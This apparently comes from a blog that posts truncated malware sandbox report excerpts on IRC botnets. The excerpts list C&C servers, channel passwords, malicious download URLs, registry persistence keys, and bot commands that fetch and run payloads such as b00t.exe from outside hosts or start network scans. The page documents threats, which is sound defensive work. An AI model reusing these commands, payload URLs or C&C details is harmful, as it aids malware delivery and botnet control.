Author: Pig

scheck.sytes.net scheck.sytes.net 208.51.78.252 ferroclubchile.cl ferroclubchile.cl 200.72.160.252 UDP Connections Remote IP Address: 127.0.0.1 Port: 1037 Send Datagram: 55 packet(s) of size 1 Recv Datagram: 55 packet(s) of size 1 Download URLs http://208.51.78.252/ps.exe (scheck.sytes.net) http://200.72.160.252/img/fam//ps.exe (ferroclubchile.cl) Outgoing connection to remote server: scheck.sytes.net TCP port 80 Outgoing connection to remote server: ferroclubchile.cl TCP port 80 DNS Lookup HostRead more...

Remote Host Port Number 193.104.27.98 80 218.61.22.10 1863 * The data identified by the following URLs was then requested from the remote web server: o http://193.104.27.98/pizda.php o http://193.104.27.98/fox.bin o http://www.ip-adress.com/ MODE [N00_USA_XP_7947582]8 @ -ix PONG eee.4088.com JOIN #superman open MODE #superman -ix * The following ports were open in the system: Port Protocol Process 1053Read more...

* Unknown Connections o Host By Name: + Requested Host: flex.sintoniatotal.org + Resulting Address: 120.126.19.44 o Connection Established: 0 o Socket: 0 * Outgoing Connections o Transport Protocol: TCP o Remote Address: 120.126.19.44 o Remote Port: 4545 o Connection Established: 0 o Socket: 1752 more here http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=12056277&cs=F7D3B935AA72AC77A9162D505FB6D5EE

Host Name IP Address h3ll.bounceme.net 66.11.238.23 Opened listening TCP connection on port: 34115 * C&C Server: 66.11.238.23:1993 * Server Password: * Username: cxcds * Nickname: L2-|7j8 * Channel: #vncshit# (Password: suckmybigdick) * Channeltopic: :.scan 64 0 y 3 0 58.x.x.x Outgoing connection to remote server: 58.163.0.1 TCP port 5900 Outgoing connection to remote server: 58.163.0.55Read more...

# UDP Connections o DNS Data + Name Server 192.168.1.200 # DNS Package: * ID: $100 * Type: Query * OP Code: Query * Flags: RD * R Code: NoError * QD Count: 1 * AN Count: 0 * NS Count: 0 * AR Count: 0 o Question Section + Question: # Name: bmcash.net #Read more...

tshge.mamadody.mobi 74.117.174.95 * C&C Server: 74.117.174.95:15656 * Server Password: * Username: nn * Nickname: hh[DEU|XP]5178227 * Channel: #t (Password: ) * Channeltopic: :.td http://expobauhaus.net/b00t.exe c:Icon32fuhygfdnf.exe 1 -s * C&C Server: 74.117.174.95:15656 * Server Password: * Username: nn * Nickname: [DEU|XP]5665417 * Channel: #t (Password: ) * Channeltopic: :.td http://expobauhaus.net/b00t.exe c:Icon32fuhygfdnf.exe 1 -s Registry Changes byRead more...

Remote Host Port Number 64.62.181.46 80 83.140.172.212 6667 * The data identified by the following URL was then requested from the remote web server: o http://h1.ripway.com/sxmast/config.php NICK u-uu6 USER l4 8 * :0.0 PONG :3083554165 JOIN #sxsouls nopass * The following port was open in the system: Port Protocol Process 1056 TCP usx32.exe (%AppData%usx32.exe) RegistryRead more...

tmcn.gadarlar.net 93.190.140.115 * C&C Server: 93.190.140.115:6667 * Server Password: * Username: tkcjkbb * Nickname: [DEU|XP|958278] * Channel: #infected (Password: infected) * Channeltopic: Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Services” = marqi.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “Windows Services” = marqi.exe HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:ecem.exe” = c:ecem.exe:*:Enabled:Windows Services Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “InstallRoot” HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “CLRLoadLogDir” HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFramework “OnlyUseLatestCLR”Read more...

69.245.107.191 (6667) chanel #rb Invisible Users: 267 Operators: 1 operator(s) online Channels: 7 channels formed Clients: I have 289 clients and 0 servers Local users: Current Local Users: 289 Max: 412 Global users: Current Global Users: 289 Max: 412

– DNS Queries: Name Query Type Query Result Successful Protocol us.unicatz.com DNS_TYPE_A 66.252.13.214 1 66.252.13.214:2010 Nick: vnzznnsc Username: vnzznnsc Joined Channel: #us# with Password d0s